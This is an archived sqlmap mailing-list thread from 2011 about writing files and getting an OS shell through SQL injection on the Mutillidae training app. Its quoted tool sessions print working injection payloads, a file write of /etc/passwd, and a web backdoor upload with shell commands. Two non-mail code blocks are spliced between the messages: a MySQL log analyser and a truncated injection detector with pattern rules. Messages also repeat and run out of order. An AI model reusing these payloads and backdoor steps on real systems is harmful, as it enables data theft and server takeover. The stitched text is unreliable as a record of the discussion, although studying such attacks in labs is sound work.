[Y/n] >> > [23:26:37] [WARNING] the testable parameter 'view_user_name' you >> > provided is not inside the GET >> > [23:26:37] [INFO] using >> > >> > '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/debian32/session' >> > as session file >> > [23:26:37] [INFO] flushing session file >> > [23:26:37] [INFO] using >> > >> > '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/results-07062011_1126pm.csv' >> > as results file >> > [23:26:37] [INFO] heuristics detected web page charset 'ascii' >> > [23:26:37] [INFO] testing if the url is stable, wait a few seconds >> > [23:26:38] [INFO] url is stable >> > [23:26:38] [INFO] heuristic test shows that POST parameter >> > 'view_user_name' might be injectable (possible DBMS: MySQL) >> > [23:26:38] [INFO] testing sql injection on POST parameter >> > 'view_user_name' >> > [23:26:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING >> > clause' >> > [23:26:40] [INFO] testing 'OR boolean-based blind - WHERE or HAVING >> > clause' >> > [23:26:42] [INFO] testing 'OR boolean-based blind - WHERE or HAVING >> > clause (Generic comment)' >> > [23:26:42] [INFO] POST parameter 'view_user_name' is 'OR boolean-based >> > blind - WHERE or HAVING clause (Generic comment)' injectable >> > [23:26:42] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or >> > HAVING clause' >> > [23:26:42] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or >> > HAVING clause' >> > [23:26:42] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING >> > clause' >> > [23:26:42] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING >> > clause' >> > [23:26:42] [INFO] testing 'MySQL OR error-based - WHERE or HAVING >> > clause' >> > [23:26:42] [INFO] POST parameter 'view_user_name' is 'MySQL OR >> > error-based - WHERE or HAVING clause' injectable >> > [23:26:42] [INFO] testing 'MySQL > 5.0.11 stacked queries' >> > [23:26:42] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)' >> > [23:26:42] [INFO] 
testing 'MySQL > 5.0.11 AND time-based blind' >> > [23:26:42] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy >> > query)' >> > [23:26:42] [INFO] testing 'MySQL > 5.0.11 OR time-based blind' >> > [23:26:42] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' >> > [23:26:43] [INFO] target url appears to be UNION injectable with 4 >> > columns >> > [23:26:43] [INFO] POST parameter 'view_user_name' is 'MySQL UNION >> > query (NULL) - 1 to 10 columns' injectable >> > [23:26:43] [WARNING] in OR boolean-based injections, please consider >> > usage of switch --drop-set-cookie if you experience any problems >> > during data retrieval >> > POST parameter 'view_user_name' is vulnerable. Do you want to keep >> > testing the others? [y/N] >> > sqlmap identified the following injection points with a total of 148 >> > HTTP(s) requests: >> > --- >> > Place: POST >> > Parameter: view_user_name >> > Type: boolean-based blind >> > Title: OR boolean-based blind - WHERE or HAVING clause (Generic >> > comment) >> > Payload: view_user_name=-5244' OR NOT (1884=1884)-- >> > &password=bDXj&Submit_button=Submit >> > >> > Type: error-based >> > Title: MySQL OR error-based - WHERE or HAVING clause >> > Payload: view_user_name=-3024' OR 1 GROUP BY >> > CONCAT(CHAR(58,97,108,119,58),(SELECT (CASE WHEN (8877=8877) THEN 1 >> > ELSE 0 END)),CHAR(58,112,119,98,58),FLOOR(RAND(0)*2)) HAVING MIN(0)-- >> > &password=bDXj&Submit_button=Submit >> > >> > Type: UNION query >> > Title: MySQL UNION query (NULL) - 1 to 10 columns >> > Payload: view_user_name=IZBb' UNION ALL SELECT NULL, >> > >> > CONCAT(CHAR(58,97,108,119,58),IFNULL(CAST(CHAR(121,74,77,117,83,105,112,118,99,84) >> > AS CHAR),CHAR(32)),CHAR(58,112,119,98,58)), NULL, >> > NULL#&password=bDXj&Submit_button=Submit >> > --- >> > >> > do you want to exploit this SQL injection? 
[Y/n] >> > [23:26:46] [INFO] testing MySQL >> > [23:26:46] [INFO] confirming MySQL >> > [23:26:46] [INFO] the back-end DBMS is MySQL >> > >> > web application technology: PHP 5.2.6, Apache 2.2.9 >> > back-end DBMS: MySQL >= 5.0.0 >> > [23:26:46] [INFO] fingerprinting the back-end DBMS operating system >> > [23:26:46] [INFO] the back-end DBMS operating system is Linux >> > [23:26:46] [WARNING] if the problem persists with 'None' values please >> > try to use hidden switch --no-cast (fixing problems with some >> > collation issues) >> > do you want confirmation that the file '/tmp/test' has been >> > successfully written on the back-end DBMS file system? [Y/n] >> > [23:26:48] [INFO] the file has been successfully written and its size >> > is 1848 bytes, but the size differs from the local file '/etc/passwd' >> > (1845 bytes) >> > [23:26:48] [WARNING] expect junk characters inside the file as a >> > leftover from UNION query >> > [23:26:48] [INFO] you can find results of scanning in multiple targets >> > mode inside the CSV file >> > >> > '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/results-07062011_1126pm.csv' >> > >> > [*] shutting down at 23:26:48 >> > --8<-- >> > >> > Cheers, >> > Bernardo >> > >> > >> > On 3 July 2011 18:03, Chris Oakley <chr...@gm...> wrote: >> >> Hi >> >> >> >> I'm playing with file writing. I have a full privs root user set up in >> >> mysql and am using >> >> >> >> http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10 >> >> to play with. I've set up a /temp folder below the web root of the >> >> app. >> >> I've put a file "evil.php" in the sqlmap working directory. I've also >> >> changed the permissions for all users on the temp folder to write >> >> access >> >> allowed. 
>> >> >> >> I'm using the following input to try and upload this file: >> >> >> >> C:\Program Files\sqlmap-0.9>python sqlmap.py -u >> >> "http://localhost/mutillidae/ind >> >> ex.php?page=user-info.php" --data >> >> "username=&password=&user-info-php-submit-butt >> >> on=View+Account+Details" -p "username" --proxy "http://127.0.0.1:8085" >> >> --file-wr >> >> ite "evil.php" --file-dest "temp/evil.php" >> >> >> >> This is with the latest dev build by the way. >> >> >> >> The output I get is: >> >> >> >> [18:00:03] [INFO] the back-end DBMS is MySQL >> >> web server operating system: Windows >> >> web application technology: PHP 5.3.5, Apache 2.2.17 >> >> back-end DBMS: MySQL 5.0 >> >> [18:00:03] [INFO] fingerprinting the back-end DBMS operating system >> >> [18:00:03] [INFO] the back-end DBMS operating system is Windows >> >> [18:00:04] [WARNING] if the problem persists with 'None' values please >> >> try >> >> to us >> >> e hidden switch --no-cast (fixing problems with some collation issues) >> >> do you want confirmation that the file 'temp/evil.php' has been >> >> successfully >> >> wri >> >> tten on the back-end DBMS file system? [Y/n] >> >> [18:00:12] [WARNING] it looks like the file has not been written, this >> >> can >> >> occur >> >> if the DBMS process' user has no write privileges in the destination >> >> path >> >> [18:00:12] [WARNING] expect junk characters inside the file as a >> >> leftover >> >> from U >> >> NION query >> >> [18:00:12] [INFO] Fetched data logged to text files under 'C:\Program >> >> Files\sqlm >> >> ap-0.9\output\localhost' >> >> >> >> [*] shutting down at 18:00:12 >> >> >> >> and sure enough the file isn't written. I've also tried using the >> >> --no-cast >> >> switch, to no avail. >> >> >> >> Does anyone have any ideas on what could be going wrong here? I can >> >> use the >> >> --file-read switch to read any file such as C:\boot.ini. 
The --os-cmd
>> >> and
>> >> --os-pwn commands also fail at the stager upload phase, probably for
>> >> similar
>> >> reasons.
>> >>
>> >> Any help would be appreciated
>> >>
>> >> Cheers
>> >>
>> >> Chris
>> >>
>> >>
>> >> ------------------------------------------------------------------------------
>> >> All of the data generated in your IT infrastructure is seriously
>> >> valuable.
>> >> Why? It contains a definitive record of application performance,
>> >> security
>> >> threats, fraudulent activity, and more. Splunk takes this data and
>> >> makes
>> >> sense of it. IT sense. And common sense.
>> >> http://p.sf.net/sfu/splunk-d2d-c2
>> >> _______________________________________________
>> >> sqlmap-users mailing list
>> >> sql...@li...
>> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>> >>
>> >
>> >
>> > --
>> > Bernardo Damele A. G.
>> >
>> > E-mail / Jabber: bernardo.damele (at) gmail.com
>> > Mobile: +447788962949 (UK 07788962949)
>> > PGP Key ID: Unavailable
>> >
>>
>>
>> --
>> Bernardo Damele A. G.
>>
>> E-mail / Jabber: bernardo.damele (at) gmail.com
>> Mobile: +447788962949 (UK 07788962949)
>> PGP Key ID: Unavailable
>
>

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: Unavailable
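The failure mode Bernardo explains in this thread (a 0 KB stager when the injected POST values match no row, and "junk characters" left over from the row data when they do) is also what a defender can recover from the database's own query log. What follows is an added example, not sqlmap's code and not anything posted in the thread: it parses MySQL general-log lines, flags INTO OUTFILE / INTO DUMPFILE writes that land under a document root, decodes the hex body carried in LINES TERMINATED BY, and models why an unmatched WHERE clause leaves the file empty. The log lines, the `accounts` table, the `WEB_ROOTS` tuple and the placeholder body are all constructed assumptions, not captures from any real system.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Sequence

# Document roots that appear in this thread (and the defaults sqlmap proposes);
# constructed list, extend it for your own servers.
WEB_ROOTS = ("/var/www/", "c:/wamp/www/", "c:/xampp/htdocs/", "c:/inetpub/wwwroot/")

# Harmless placeholder standing in for a file body; the thread's writes carry the
# body hex-encoded inside LINES TERMINATED BY 0x...
PLACEHOLDER_BODY = b"<?php /* placeholder */ ?>"

# Constructed MySQL general-log lines ("time  id Command  Argument" layout), not a
# real capture. Line 2 has the shape of a LIMIT 1 INTO OUTFILE write into the web
# root; line 3 uses a WHERE clause that matches no row; line 4 is a file read.
SAMPLE_LOG = "\n".join([
    "110707 23:51:30\t   12 Query\tSELECT * FROM accounts WHERE username='admin'",
    "110707 23:51:35\t   12 Query\tSELECT * FROM accounts WHERE username='admin' LIMIT 0,1 "
    "INTO OUTFILE '/var/www/test/tmpugbmo.php' LINES TERMINATED BY 0x" + PLACEHOLDER_BODY.hex(),
    "110707 23:51:36\t   12 Query\tSELECT 1 FROM accounts WHERE username='nobody' LIMIT 0,1 "
    "INTO OUTFILE '/tmp/empty' LINES TERMINATED BY 0x41",
    "110707 23:51:40\t   13 Query\tSELECT LOAD_FILE('/etc/passwd')",
    "110707 23:51:41\t   13 Query\tSELECT name FROM accounts WHERE id=3",
])

LOG_RE = re.compile(r"^\S+ \S+\t\s*(?P<id>\d+) Query\t(?P<sql>.*)$")
WRITE_RE = re.compile(r"\bINTO\s+(?:OUTFILE|DUMPFILE)\s+'(?P<path>[^']+)'", re.I)
READ_RE = re.compile(r"\bLOAD_FILE\s*\(\s*'(?P<path>[^']+)'", re.I)
TERM_RE = re.compile(r"\bLINES\s+TERMINATED\s+BY\s+0x(?P<hex>[0-9a-f]+)", re.I)


@dataclass
class FileAccess:
    conn_id: int
    kind: str              # "write" (INTO OUTFILE/DUMPFILE) or "read" (LOAD_FILE)
    path: str
    in_web_root: bool
    body: Optional[bytes]  # decoded LINES TERMINATED BY payload, if present


def under_web_root(path: str) -> bool:
    """Case-insensitive prefix check after normalising Windows separators."""
    norm = path.replace("\\", "/").lower()
    return any(norm.startswith(root) for root in WEB_ROOTS)


def classify(conn_id: int, sql: str) -> Optional[FileAccess]:
    """Return a FileAccess if the statement reads or writes the server file system."""
    m = WRITE_RE.search(sql)
    if m:
        t = TERM_RE.search(sql)
        body = bytes.fromhex(t.group("hex")) if t else None
        return FileAccess(conn_id, "write", m.group("path"), under_web_root(m.group("path")), body)
    m = READ_RE.search(sql)
    if m:
        return FileAccess(conn_id, "read", m.group("path"), under_web_root(m.group("path")), None)
    return None


def find_file_access(log_text: str) -> List[FileAccess]:
    """Walk general-log lines and collect every file read or write."""
    events = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ev = classify(int(m.group("id")), m.group("sql"))
        if ev is not None:
            events.append(ev)
    return events


def webroot_writes(log_text: str) -> List[str]:
    """Paths of writes that land under a document root: the ones worth an alert."""
    return [e.path for e in find_file_access(log_text) if e.kind == "write" and e.in_web_root]


def simulated_outfile(rows: Sequence[Sequence[bytes]], terminator: bytes) -> bytes:
    """Model of SELECT ... INTO OUTFILE ... LINES TERMINATED BY <terminator> with the
    default tab field separator: each selected row is written followed by the
    terminator. With one matching row the file is that row's columns (the "junk
    characters" the thread mentions) plus the body; with no matching row the file
    is created but stays empty, which is the 0 KB stager the thread describes."""
    return b"".join(b"\t".join(row) + terminator for row in rows)


if __name__ == "__main__":
    for ev in find_file_access(SAMPLE_LOG):
        flag = "ALERT" if ev.kind == "write" and ev.in_web_root else "info"
        print(f"[{flag}] conn {ev.conn_id}: {ev.kind} {ev.path} body={ev.body!r}")
    print("no matching row ->", simulated_outfile([], PLACEHOLDER_BODY))
```

Run it directly to list the events and the empty-file case. On the hardening side the thread already names the controls: the application's MySQL account should not hold the FILE privilege (Chris is testing with a "full privs root user"), the web root should not be writable by the MySQL server process (the "no write privileges in the destination path" warning is that defence working), and MySQL's `secure_file_priv` setting confines INTO OUTFILE and LOAD_FILE to one directory or, set to NULL, disables them entirely.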
From: Chris O. <chr...@gm...> - 2011-07-07 10:37:14
Hi Bernardo

I'm not sure what you mean when you say that the POST parameters are
invalid. I tried the following:

C:\Program Files\sqlmap-0.9>python sqlmap.py -u "http://localhost/muti
llidae/index.php?page=user-info.php" --data "username=foo&password=bar
&user-info-php-submit-button=View+Account+details" -p "username" --os-shell

and the following occurs:

[11:31:47] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5.0
[11:31:47] [INFO] going to use a web backdoor for command prompt
[11:31:47] [INFO] fingerprinting the back-end DBMS operating system
[11:31:48] [INFO] the back-end DBMS operating system is Windows
[11:31:48] [INFO] trying to upload the file stager
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] PHP (default)
[4] JSP
>
[11:31:49] [WARNING] unable to retrieve the web server document root
please provide the web server document root [C:/xampp/htdocs/,C:/Inetp
ub/wwwroot/]: C:\wamp\www\mutillidae
[11:32:01] [WARNING] unable to retrieve any web server path
please provide any additional web server full path to try to upload th
e agent [Enter for None]: C:\wamp\www\mutillidae
[11:32:07] [WARNING] unable to upload the file stager on 'C:/wamp/www/
mutillidae'
[11:32:08] [WARNING] unable to upload the file stager on 'C:/wamp/www/
mutillidae/mutillidae'
[11:32:08] [WARNING] HTTP error codes detected during testing:
404 (Not Found) - 2 times
[11:32:08] [INFO] Fetched data logged to text files under 'C:\Program
Files\sqlmap-0.9\output\localhost'

[*] shutting down at 11:32:08

Could it be to do with:

[11:31:49] [WARNING] unable to retrieve the web server document root
please provide the web server document root [C:/xampp/htdocs/,C:/Inetp
ub/wwwroot/]: C:\wamp\www\mutillidae
[11:32:01] [WARNING] unable to retrieve any web server path
please provide any additional web server full path to try to upload th
e agent [Enter for None]: C:\wamp\www\mutillidae

Regards

Chris

On 6 July 2011 23:52, Bernardo Damele A. G. <ber...@gm...> wrote:
> Hi Chris,
>
> No worries.
> If you want command execution, sqlmap can handle it automatically also
> when it's MySQL and you've got a writable folder within the document
> root, --os-cmd and --os-shell. Also, --os-pwn can work in this
> scenario too.
> The file stager uploaded is 0KB because you provide invalid values to
> the POST parameters. sqlmap uses the LIMIT 1 INTO OUTFILE trick to
> upload the file stager against MySQL.
>
> See:
> --8<--
> $ python sqlmap.py -u
> "http://debian32/mutillidae/index.php?page=user-info.php" --data
> "view_user_name=admin&password=adminpass&Submit_button=Submit" -v 1
> --os-shell --flush-session
>
> sqlmap/1.0-dev (r4217) - automatic SQL injection and database takeover
> tool
> http://sqlmap.sourceforge.net
>
> [!] legal disclaimer: usage of sqlmap for attacking targets without
> prior mutual consent is illegal. It is the end user's responsibility
> to obey all applicable local, state and federal laws.
Authors assume > no liability and are not responsible for any misuse or damage caused > by this program > > [*] starting at 23:49:52 > > [23:49:52] [INFO] setting file for logging HTTP traffic > [23:49:52] [INFO] using > > '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/debian32/session' > as session file > [23:49:52] [INFO] flushing session file > [23:49:52] [INFO] testing connection to the target url > [23:49:52] [INFO] heuristics detected web page charset 'ascii' > [23:49:52] [INFO] testing if the url is stable, wait a few seconds > [23:49:53] [INFO] url is stable > [23:49:53] [INFO] testing if POST parameter 'view_user_name' is dynamic > [23:49:53] [WARNING] POST parameter 'view_user_name' appears to be not > dynamic > [23:49:53] [INFO] heuristic test shows that POST parameter > 'view_user_name' might be injectable (possible DBMS: MySQL) > [23:49:53] [INFO] testing sql injection on POST parameter 'view_user_name' > [23:49:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING > clause' > [23:49:54] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or > HAVING clause' > [23:49:54] [INFO] POST parameter 'view_user_name' is 'MySQL >= 5.0 AND > error-based - WHERE or HAVING clause' injectable > [23:49:54] [INFO] testing 'MySQL > 5.0.11 stacked queries' > [23:49:54] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' > [23:50:04] [INFO] POST parameter 'view_user_name' is 'MySQL > 5.0.11 > AND time-based blind' injectable > [23:50:04] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' > [23:50:04] [INFO] target url appears to be UNION injectable with 4 columns > [23:50:04] [INFO] POST parameter 'view_user_name' is 'MySQL UNION > query (NULL) - 1 to 10 columns' injectable > POST parameter 'view_user_name' is vulnerable. Do you want to keep > testing the others? 
[y/N] > sqlmap identified the following injection points with a total of 30 > HTTP(s) requests: > --- > Place: POST > Parameter: view_user_name > Type: error-based > Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause > Payload: view_user_name=admin' AND (SELECT 3033 FROM(SELECT > COUNT(*),CONCAT(CHAR(58,108,114,100,58),(SELECT (CASE WHEN (3033=3033) > THEN 1 ELSE 0 END)),CHAR(58,116,116,115,58),FLOOR(RAND(0)*2))x FROM > INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND > 'ekpw'='ekpw&password=adminpass&Submit_button=Submit > > Type: UNION query > Title: MySQL UNION query (NULL) - 1 to 10 columns > Payload: view_user_name=admin' UNION ALL SELECT NULL, NULL, > > CONCAT(CHAR(58,108,114,100,58),IFNULL(CAST(CHAR(67,69,82,68,112,104,67,118,70,113) > AS CHAR),CHAR(32)),CHAR(58,116,116,115,58)), NULL# AND > 'TOwv'='TOwv&password=adminpass&Submit_button=Submit > > Type: AND/OR time-based blind > Title: MySQL > 5.0.11 AND time-based blind > Payload: view_user_name=admin' AND SLEEP(5) AND > 'BfoH'='BfoH&password=adminpass&Submit_button=Submit > --- > > [23:51:31] [INFO] the back-end DBMS is MySQL > > web application technology: PHP 5.2.6, Apache 2.2.9 > back-end DBMS: MySQL 5.0 > [23:51:31] [INFO] going to use a web backdoor for command prompt > [23:51:31] [INFO] fingerprinting the back-end DBMS operating system > [23:51:31] [INFO] the back-end DBMS operating system is Linux > [23:51:31] [INFO] trying to upload the file stager > which web application language does the web server support? 
> [1] ASP > [2] ASPX > [3] PHP (default) > [4] JSP > > > [23:51:32] [WARNING] unable to retrieve the web server document root > please provide the web server document root [/var/www/]: > [23:51:32] [WARNING] unable to retrieve any web server path > please provide any additional web server full path to try to upload > the agent [Enter for None]: /var/www/test > [23:51:35] [WARNING] unable to upload the file stager on '/var/www' > [23:51:35] [INFO] the file stager has been successfully uploaded on > '/var/www/test' - http://debian32:80/test/tmpugbmo.php > [23:51:35] [INFO] the backdoor has probably been successfully uploaded > on '/var/www/test' - http://debian32:80/test/tmpbnhpd.php > [23:51:35] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER > os-shell> id > do you want to retrieve the command standard output? [Y/n/a] > command standard output: 'uid=33(www-data) gid=33(www-data) > groups=33(www-data)' > > os-shell> pwd > do you want to retrieve the command standard output? [Y/n/a] > command standard output: '/var/www/test' > > os-shell> exit > [23:51:44] [WARNING] HTTP error codes detected during testing: > 404 (Not Found) - 1 times > [23:51:44] [INFO] Fetched data logged to text files under > '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/debian32' > > [*] shutting down at 23:51:44 > --8<-- > > Cheers, > Bernardo > > > On 6 July 2011 23:46, <chr...@gm...> wrote: > > Hi > > > > Thanks. It turns out I was being an idiot. With absolute paths I didn't > realise that this also includes the destination file name. With that > included, it works like a dream. > > > > What I haven't managed to get going properly yet is the --os-cmd flag. > The temp stager file does appear, but is empty, 0KB. However; I think I'll > save that one for another day! > > > > Regards > > > > Chris > > ------------------ > > > > -----Original Message----- > > From: "Bernardo Damele A. G." 
<ber...@gm...> > > Date: Wed, 6 Jul 2011 23:42:22 > > To: Chris Oakley<chr...@gm...> > > Cc: <sql...@li...> > > Subject: Re: [sqlmap-users] File Writing > > > > Hi Chris, > > > > To me it works well: > > --8<-- > > $ python sqlmap.py -u > > "http://debian32/mutillidae/index.php?page=user-info.php" --forms -p > > view_user_name --risk 3 --level 3 --parse-errors --file-write > > /etc/passwd --file-dest /tmp/test --flush-session > > > > sqlmap/1.0-dev (r4217) - automatic SQL injection and database takeover > tool > > http://sqlmap.sourceforge.net > > > > [!] legal disclaimer: usage of sqlmap for attacking targets without > > prior mutual consent is illegal. It is the end user's responsibility > > to obey all applicable local, state and federal laws. Authors assume > > no liability and are not responsible for any misuse or damage caused > > by this program > > > > [*] starting at 23:26:35 > > > > [23:26:35] [INFO] setting file for logging HTTP traffic > > [23:26:35] [INFO] testing connection to the target url > > [23:26:35] [INFO] heuristics detected web page charset 'ascii' > > [23:26:35] [INFO] searching for forms > > [#1] form: > > POST http://debian32:80/mutillidae/index.php?page=user-info.php > > POST data: view_user_name=&password=&Submit_button=Submit > > do you want to test this form? [Y/n/q] > >> > > Edit POST data [default: > > view_user_name=&password=&Submit_button=Submit] (Warning: blank fields > > detected): > > do you want to fill blank fields with random values? 
From: Bernardo D. A. G. <ber...@gm...> - 2011-07-07 00:01:46
Hi Marek,

On 5 July 2011 22:33, Stiefenhofer, Marek <M.S...@r-...> wrote:
> ...
> Miroslav posted some news about an ongoing SQLi ModSecurity challenge. I was
> curious and had a quick look at it. One of the vulnerable applications has
> an MS Access DB and can be UNION based injected.

Two of them are Access, the other two are MySQL 4 and MySQL 5.0. We will post the details about our bypass of ModSecurity soon and the related tamper scripts will be committed to sqlmap trunk as well.

> Unfortunately UNION based tests against MS Access will always fail with
> sqlmap, because for UNION based injections the defined comment string
> (queries.xml) is not respected. Access needs %00 as comment string and even
> this is not working in many cases.

This is a known problem. Just addressed, read below.

> One quick fix would be adding special Access UNION test definitions to
> payload.xml like it has been done for MySQL.

Handling these corner cases specifically to detect a certain technique against a dodgy database management system is in our TODO list already. Also, MSysAccessObjects seems to be a viable option. Detection of UNION query against Access is now fixed.

> Another problem is the defined SELECT_FROM for MS Access dbms, it's
> MSysObjects. In the ModSecurity challenge this system table has no read
> permissions hence any UNION test must fail. But the system table
> MSysAccessXML has read permissions in this specific case.
>
> Does anyone know which of the two tables is more likely to have read access
> in the wild? Does it make sense to change SELECT_FROM? Is MSysAccessXML
> present in older MS Access versions?

No users have read privileges over MSysObjects by default. I can't comment on MSysAccessXML. Anyone else?

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: Unavailable
From: Bernardo D. A. G. <ber...@gm...> - 2011-07-06 22:53:02
Hi Chris,

No worries. If you want command execution, sqlmap can handle it automatically also when it's MySQL and you've got a writable folder within the document root, --os-cmd and --os-shell. Also, --os-pwn can work in this scenario too.

The file stager uploaded is 0KB because you provide invalid values to the POST parameters. sqlmap uses the LIMIT 1 INTO OUTFILE trick to upload the file stager against MySQL. See:

--8<--
$ python sqlmap.py -u "http://debian32/mutillidae/index.php?page=user-info.php" --data "view_user_name=admin&password=adminpass&Submit_button=Submit" -v 1 --os-shell --flush-session

sqlmap/1.0-dev (r4217) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 23:49:52

[23:49:52] [INFO] setting file for logging HTTP traffic
[23:49:52] [INFO] using '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/debian32/session' as session file
[23:49:52] [INFO] flushing session file
[23:49:52] [INFO] testing connection to the target url
[23:49:52] [INFO] heuristics detected web page charset 'ascii'
[23:49:52] [INFO] testing if the url is stable, wait a few seconds
[23:49:53] [INFO] url is stable
[23:49:53] [INFO] testing if POST parameter 'view_user_name' is dynamic
[23:49:53] [WARNING] POST parameter 'view_user_name' appears to be not dynamic
[23:49:53] [INFO] heuristic test shows that POST parameter 'view_user_name' might be injectable (possible DBMS: MySQL)
[23:49:53] [INFO] testing sql injection on POST parameter 'view_user_name'
[23:49:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:49:54] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[23:49:54] [INFO] POST parameter 'view_user_name' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[23:49:54] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[23:49:54] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[23:50:04] [INFO] POST parameter 'view_user_name' is 'MySQL > 5.0.11 AND time-based blind' injectable
[23:50:04] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[23:50:04] [INFO] target url appears to be UNION injectable with 4 columns
[23:50:04] [INFO] POST parameter 'view_user_name' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable
POST parameter 'view_user_name' is vulnerable. Do you want to keep testing the others? [y/N]
sqlmap identified the following injection points with a total of 30 HTTP(s) requests:
---
Place: POST
Parameter: view_user_name
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: view_user_name=admin' AND (SELECT 3033 FROM(SELECT COUNT(*),CONCAT(CHAR(58,108,114,100,58),(SELECT (CASE WHEN (3033=3033) THEN 1 ELSE 0 END)),CHAR(58,116,116,115,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ekpw'='ekpw&password=adminpass&Submit_button=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: view_user_name=admin' UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,108,114,100,58),IFNULL(CAST(CHAR(67,69,82,68,112,104,67,118,70,113) AS CHAR),CHAR(32)),CHAR(58,116,116,115,58)), NULL# AND 'TOwv'='TOwv&password=adminpass&Submit_button=Submit

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: view_user_name=admin' AND SLEEP(5) AND 'BfoH'='BfoH&password=adminpass&Submit_button=Submit
---

[23:51:31] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL 5.0
[23:51:31] [INFO] going to use a web backdoor for command prompt
[23:51:31] [INFO] fingerprinting the back-end DBMS operating system
[23:51:31] [INFO] the back-end DBMS operating system is Linux
[23:51:31] [INFO] trying to upload the file stager
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] PHP (default)
[4] JSP
>
[23:51:32] [WARNING] unable to retrieve the web server document root
please provide the web server document root [/var/www/]:
[23:51:32] [WARNING] unable to retrieve any web server path
please provide any additional web server full path to try to upload the agent [Enter for None]: /var/www/test
[23:51:35] [WARNING] unable to upload the file stager on '/var/www'
[23:51:35] [INFO] the file stager has been successfully uploaded on '/var/www/test' - http://debian32:80/test/tmpugbmo.php
[23:51:35] [INFO] the backdoor has probably been successfully uploaded on '/var/www/test' - http://debian32:80/test/tmpbnhpd.php
[23:51:35] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> id
do you want to retrieve the command standard output? [Y/n/a]
command standard output: 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
os-shell> pwd
do you want to retrieve the command standard output? [Y/n/a]
command standard output: '/var/www/test'
os-shell> exit
[23:51:44] [WARNING] HTTP error codes detected during testing:
404 (Not Found) - 1 times
[23:51:44] [INFO] Fetched data logged to text files under '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/debian32'

[*] shutting down at 23:51:44
--8<--

Cheers,
Bernardo

On 6 July 2011 23:46, <chr...@gm...> wrote:
> Hi
>
> Thanks. It turns out I was being an idiot. With absolute paths I didn't realise that this also includes the destination file name. With that included, it works like a dream.
>
> What I haven't managed to get going properly yet is the --os-cmd flag. The temp stager file does appear, but is empty, 0KB. However, I think I'll save that one for another day!
>
> Regards
>
> Chris
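Added example, not sqlmap's own code or anything posted to the list: a small detector that runs over web server log lines and flags the probe shapes that appear in this thread, the MySQL UNION, error-based, time-based and INTO OUTFILE payloads from the sessions above and the %00-terminated, MSys*-table probes from the MS Access discussion. The log format (common log fields plus a quoted request body) and every log line are constructed for the example.

```python
"""Flag sqlmap-style SQL injection probes in web server log lines.

Added example, not sqlmap's own code. The rules encode the payload shapes seen
in this thread: MySQL UNION / error-based / time-based probes carrying the
CHAR(58,...) delimiters, file writes via INTO OUTFILE, and MS Access probes
that end in a %00 terminator or touch the MSys* system tables. The log format
and every log line below are constructed for the example.
"""
import re
from urllib.parse import parse_qsl, urlencode, urlsplit

# (rule name, regex applied to each URL-decoded parameter value)
RULES = [
    ("union-null-columns", re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\s+NULL\b", re.I)),
    ("char-concat-marker", re.compile(r"CONCAT\(\s*CHAR\(\s*58\s*,", re.I)),
    ("error-based-rand", re.compile(r"FLOOR\(\s*RAND\(\s*0\s*\)\s*\*\s*2\s*\)", re.I)),
    ("time-based-sleep", re.compile(r"\bSLEEP\(\s*\d+\s*\)", re.I)),
    ("into-outfile", re.compile(r"\bINTO\s+(?:OUT|DUMP)FILE\b", re.I)),
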